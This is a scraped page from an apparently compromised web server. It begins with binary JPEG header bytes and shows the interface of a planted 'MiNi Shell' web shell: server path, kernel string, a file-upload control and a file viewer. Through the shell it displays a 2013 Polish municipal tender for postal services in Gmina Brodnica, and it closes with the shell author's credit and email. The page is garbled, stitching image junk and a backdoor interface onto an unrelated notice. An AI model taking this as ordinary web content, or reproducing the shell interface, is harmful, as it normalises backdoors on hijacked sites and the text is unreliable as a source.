JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131204/500478-N-2013.html

<p class="kh_header"><b>Brodnica: Świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla potrzeb
 Gminy Brodnica oraz jednostek organizacyjnych gminy</b><br>
<b>Numer ogłoszenia: 500478 - 2013; data zamieszczenia: 04.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brodnica , ul. Zamkowa 13 A, 87-300 Brodnica, woj. kujawsko-pomorskie, tel. 56 4941612, faks 56 4941640.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.brodnica.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla potrzeb
 Gminy Brodnica oraz jednostek organizacyjnych gminy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I .Przedmiot zamówienia
1. Świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla potrzeb Gminy        Brodnica oraz jednostek organizacyjnych gminy  polegających na przyjmowaniu, przemieszczaniu i     doręczaniu  przesyłek listowych nierejestrowanych, przesyłek listowych rejestrowanych oraz zwrotu      przesyłek niedoręczonych w rozumieniu przepisów ustawy z dnia 23 listopada 2012r. Prawo      pocztowe (tj. Dz. U. z 2012r. poz. 1529 z późn. zm.).
2. Przedmiotem zamówienia jest doręczanie następujących przesyłek listowych:
    1) przesyłki listowe (zwykłe) nierejestrowane w obrocie krajowym - 7.194 szt;
    2) przesyłki listowe (zwykłe) nierejestrowane (szybszej kategorii- priorytetowe) w  obrocie          krajowym - 258 szt;
    3) przesyłki listowe polecone rejestrowane bez potwierdzenia odbioru w obrocie krajowym - 130          szt;
    4) przesyłki listowe polecone rejestrowane z potwierdzeniem odbioru (ZPO) w obrocie krajowym -           13.864 szt;
    5) przesyłki listowe rejestrowane (szybszej kategorii - priorytetowe) z potwierdzeniem odbioru           (ZPO) w obrocie krajowym - 31 szt;
    6) przesyłki listowe rejestrowane (szybszej kategorii - priorytetowe) bez potwierdzenia odbioru w           obrocie krajowym - 34 szt;
    7)  przesyłki listowe priorytetowe - polecone rejestrowane z potwierdzeniem odbioru (ZPO)  w           obrocie zagranicznym - 2 szt;
    8) paczki polecone z potwierdzeniem odbioru (ZPO) w obrocie krajowym - 23 szt.
3. Przedmiot zamówienia obejmuje następujący zakres, według kodów Wspólnego Słownika   Zamówień (CPV):
64110000-0 - Usługi pocztowe
64112000-4 - Usługi pocztowe dotyczące listów
64113000-1 - Usługi pocztowe dotyczące paczek

II. Opis przedmiotu zamówienia
1. Przez przesyłki listowe objęte przedmiotem niniejszego zamówienia Zamawiający rozumie:
    1) zwykłe - przesyłki nierejestrowane, które nie są przesyłkami najszybszej kategorii w obrocie                       krajowym i zagranicznym;
    2) zwykłe priorytetowe - przesyłki nierejestrowane, najszybszej kategorii w obrocie krajowym i         zagranicznym;
    3) polecone - przesyłki rejestrowane, przyjęte za potwierdzeniem nadania, które nie są  przesyłkami          najszybszej kategorii w obrocie krajowym i zagranicznym;
    4) polecone priorytetowe - przesyłki rejestrowane, przyjęte za potwierdzeniem nadania,
        najszybszej kategorii w obrocie krajowym i zagranicznym;
5) polecone z potwierdzeniem odbioru - przesyłki rejestrowane, przyjęte za potwierdzeniem
    nadania, które nie są przesyłkami najszybszej kategorii i doręczone za zwrotnym potwierdzeniem     odbioru;
6) polecone priorytetowe z potwierdzeniem odbioru - przesyłki rejestrowane, przyjęte za
    potwierdzeniem nadania, najszybszej kategorii i doręczane za zwrotnym potwierdzeniem odbioru;
7) paczki polecone z potwierdzeniem odbioru - paczki rejestrowane;
8) zamawiający przewiduje nadawanie przesyłek listowych o następujących gabarytach:
    a) gabaryt A - przesyłki o wymiarach:
       - minimum: wymiary strony adresowej nie mogą być mniejsze niż 90x140mm
       - maksimum: żaden z wymiarów nie może przekroczyć: wysokości (grubości) 20mm, długości               325 mm, szerokości 230 mm;
   b) gabaryt B - przesyłki o wymiarach:
       - minimum: jeśli choć jeden z wymiarów przekracza wysokość 20 mm, lub długość
         325 mm, lub szerokość 230 mm;
      - maksimum: suma długości, szerokości i wysokości 900 mm, przy czym największy z
         tych wymiarów (długość) nie może przekroczyć 600 mm
      - ustala się tolerancję wszystkich wymiarów +/- 2 mm.
2. Zamawiający sam będzie dostarczał korespondencję do wyznaczonego urzędu pocztowego.
3. Zamawiający sam będzie odbierał korespondencję z wyznaczonego urzędu pocztowego.
4. Przesyłki, o których mowa powyżej nadawane są w miejscowości Brodnica w formie opłaty z
    dołu.
5. Nadanie przesyłek musi następować w dniu ich nadania przez Zamawiającego w siedzibie
    Wykonawcy.
6. Objęte przedmiotem niniejszego zamówienia przesyłki dostarczane będą przez wykonawcę do         każdego wskazanego na przesyłce miejsca w kraju i za granicą objętego porozumieniami     międzynarodowymi w tym zakresie.
7. Potwierdzenie odbioru przesyłek nadanych w sposób wymieniony w ust. 1 pkt 5 i 6 niniejszej     specyfikacji zawierające datę odbioru przesyłki i czytelny podpis odbiorcy wykonawca będzie     niezwłocznie doręczał do Zamawiającego według właściwości miejsca nadania przesyłki.
8. W każdym przypadku nieobecności adresata przesyłki Wykonawca pozostawi adresatowi     zawiadomienie o próbie dostarczenia przesyłki (pierwsze awizo) zawierające wskazanie miejsca i     czasu odbioru przesyłki przez adresata. Termin odbioru przesyłki przez adresata po pierwszym     awizo ustala się na 7 dni, licząc od dnia pozostawienia pierwszego zawiadomienia,  a po upływie     tego terminu w przypadku niepodjęcia przesyłki przez adresata wymagane jest wystawienie     powtórnego zawiadomienia (powtórne awizo) o możliwości odbioru przesyłki w terminie nie           dłuższym niż 14 dni licząc od dnia pierwszego zawiadomienia. Po upływie czternastodniowego                terminu nieodebrana przez adresata przesyłka podlega zwrotowi z podaniem przyczyny     nieodebrania    przesyłki zgodnie z art. 44 Kpa.
9. Doręczenie przesyłki rejestrowanej następuje na zasadach określonych w ustawie z dnia 14 czerwca       1960 r. Kodeks postępowania administracyjnego (Dz. U. z 2000r. Nr 98, poz. 1071 z późn. zm.).
10.Przesyłki objęte przedmiotem niniejszego zamówienia nadawane będą w kopertach (opakowaniach)       Zamawiającego.
11. Zamawiający wymaga, aby datą wiążącą dla przesyłek listowych była data nadania przesyłki w       siedzibie Wykonawcy.
12. Przewidywana ilość przesyłek, w tym poszczególnych rodzajów przesyłek wymienionych w ust. 1,       w okresie obowiązywania umowy została wskazana w Formularzu cenowym, stanowiącym      Załączniki  nr 2a i 2b do SIWZ z zastrzeżeniem, że rzeczywiste ilości przesyłek jak i ich rodzaje,         w okresie obowiązywania umowy, będą wynikać z aktualnych potrzeb Zamawiającego, a więc       mogą odbiegać od ilości wskazanych w wyżej wymienionych Załącznikach.
13. Świadczenie usług będących przedmiotem niniejszego postępowania odbywać się będzie na       podstawie zawartej umowy.
14. Rzeczywiste wynagrodzenie wykonawcy stanowić będzie iloczyn ilości przesyłek poszczególnych         rodzajów wymienionych w ust. 1 zrealizowanych w okresie rozliczeniowym i cen jednostkowych       za poszczególne rodzaje tych przesyłek określonych w Załącznikach  nr 2a i 2b do niniejszej       specyfikacji na podstawie dokumentów nadawczych i oddawczych. 
15. Cena podana przez wykonawcę w Załącznikach nr 2a i 2b do niniejszej SIWZ nie będzie ulegała        zmianom przez cały okres obowiązywania umowy z zastrzeżeniem:
      1) zmiany stawki VAT na usługi pocztowe,
      2) zmiany cennika na powszechne usługi pocztowe, zatwierdzonego przez Prezesa Urzędu            Komunikacji Elektronicznej lub w sposób dopuszczony przez obowiązujące przepisy prawa          pocztowego.
16. Reklamacje dotyczące niewykonania lub nienależytego wykonania usługi Zamawiający będzie         składał Wykonawcy po upływie 14 dni od nadania przesyłki rejestrowanej, nie później jednak niż       12 miesięcy od dnia jej nadania. Termin rozpatrzenia reklamacji nie może być dłuższy niż 30 dni       od dnia jej złożenia.
17. Zamawiający zobowiązuje się do :
     1) prawidłowego adresowania nadawanych przesyłek zgodnie z powszechnie obowiązującymi           normami w tym zakresie,
     2) sporządzania dla nadawanych przesyłek zestawień ilościowo wartościowych w dwóch                           egzemplarzach, uwzględniających podział na przesyłki rejestrowane i nierejestrowane, kategorie           i podziały wagowe. Zestawienia ilościowo wartościowe będą sporządzane odrębnie dla: Urzędu          Gminy Brodnica, Urzędu Gminy Brodnica - gospodarka odpadami komunalnymi, Gminy          Brodnica - gospodarka wodno-ściekowa, Gminnego Ośrodka Pomocy Społecznej, Gminnej          Biblioteki Publicznej w Szczuce, Szkoły Podstawowej w Gortatowie, Szkoły Podstawowej w          Gorczenicy, Szkoły Podstawowej w Szabdzie i Gimnazjum w Szczuce..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, którzy posiadają uprawnienia do wykonywania działalności pocztowej czyli aktualny wpis do rejestru  operatorów pocztowych lub zezwolenie do prowadzenia działalności pocztowej wydane przez Prezesa Urzędu Komunikacji Elektronicznej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, któzy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres             prowadzenia działalności jest krótszy w tym okresie wykonali, a w przypadku  świadczeń            okresowych lub ciągłych wykonują co najmniej dwie usługi w zakresie świadczenia usług  pocztowych w obrocie krajowym i zagranicznym polegające na  przyjmowaniu,  przemieszczaniu i doręczaniu przesyłek listowych o wartości łącznej nie mniejszej niż 60.000,00zł rocznie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego  warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana cen jednostkowych określonych w załaczniku 2a i 2b do SIWZ w przypadku: 
- ustawowej zmiany stawki VAT na usługi pocztowe,
- zmiany cennika na powszechne usługi pocztowe, zatwierdzonego przez Prezesa Urzędu Komunikacji Elektronicznej lub w sposób dopuszczony przez obowiązujące przepisy prawa pocztowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.brodnica.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Brodnica
ul. Zamkowa 13A
87 - 300 Brodnica
pok. 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 10:00, miejsce: Urząd Gminy Brodnica
ul. Zamkowa 13A
87 - 300 Brodnica
pok. 201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com